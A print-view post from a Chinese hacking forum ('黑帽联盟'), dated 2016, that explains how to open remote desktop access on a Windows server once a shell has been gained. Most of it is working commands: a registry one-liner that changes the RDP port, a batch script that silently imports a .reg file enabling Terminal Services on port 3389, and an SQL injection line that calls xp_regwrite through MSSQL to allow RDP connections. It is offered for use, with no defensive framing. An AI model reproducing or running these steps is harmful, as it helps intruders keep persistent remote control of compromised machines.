黑帽联盟

标题: 拿了shell怎么开启远程端口 [打印本页]

---

作者: 定位    时间: 2016-10-13 04:11
标题: 拿了shell怎么开启远程端口

要看是什么系统。

2000的话，需要传3389.exe运行才行。

2003的话方法就多了，可以实现一句话开3389：

reg add"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 80 /f

【3389.bat开3389】

echoWindows Registry Editor Version 5.00 >3389.reg

echo.>>3389.reg

echo[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]>>3389.reg

echo"Enabled"="0" >>3389.reg

echo[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>>3389.reg

echo"ShutdownWithoutLogon"="0" >>3389.reg

echo[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]>>3389.reg

echo"EnableAdminTSRemote"=dword:00000001 >>3389.reg

echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg

echo"TSEnabled"=dword:00000001 >>3389.reg

echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg

echo"Start"=dword:00000002 >>3389.reg

echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>>3389.reg

echo"Start"=dword:00000002 >>3389.reg

echo[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg

echo"Hotkey"="1" >>3389.reg

echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp] >>3389.reg

echo"PortNumber"=dword:00000D3D >>3389.reg

echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp] >>3389.reg

echo"PortNumber"=dword:00000D3D >>3389.reg

regedit/s 3389.reg

【1433一句话开3389】

execmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\TerminalServer','fDenyTSConnections','REG_DWORD',0;--

---

欢迎光临 黑帽联盟 (https://bbs.cnblackhat.com/)

Powered by Discuz! X2.5